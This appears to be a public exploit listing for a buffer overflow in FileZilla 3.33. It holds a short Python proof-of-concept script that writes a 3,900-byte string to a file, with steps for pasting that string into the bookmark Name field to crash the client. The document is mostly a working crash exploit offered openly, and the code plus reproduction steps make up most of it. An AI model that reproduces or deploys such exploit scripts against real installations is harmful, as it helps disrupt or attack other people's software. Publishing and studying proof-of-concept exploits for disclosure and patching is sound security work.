FileZilla 3.33 Buffer Overflow

FileZilla version 3.33 suffers from a buffer overflow vulnerability.

MD5 | 7990ce5708a3bacdfcaaf6ae7cd8e40f

# Exploit Title: FileZilla 3.33 Buffer-Overflow (PoC)

# Author: Kagan Capar

# Discovery Date: 2018-10-10

# Software Link:

# Vendor Homepage :

# Tested Version: 3.33

# Tested on OS: Kali Linux 2018.3 x64

# Steps to Reproduce: Run the Python exploit script; it will create a new

# file named "exploit.txt". Copy the contents of "exploit.txt".

# Open a new terminal and run "filezilla".

# Go to Bookmarks and choose Add bookmark, or press Ctrl + B.

# Paste the contents of "exploit.txt" into the "Name:" field.

# Click "OK", then click "Bookmarks"; you will see a crash in the terminal.


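buffer = "\x50\x48\x52" * 1300  # "PHR" repeated 1300 times (3900 bytes)

payload = buffer
print("[+] Creating %s bytes evil payload.." % len(payload))
try:
    # Write the payload to "exploit.txt", the file named in the steps above
    with open("exploit.txt", "w") as f:
        f.write(payload)
    print("[+] File created!")
except IOError:
    print("File cannot be created")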

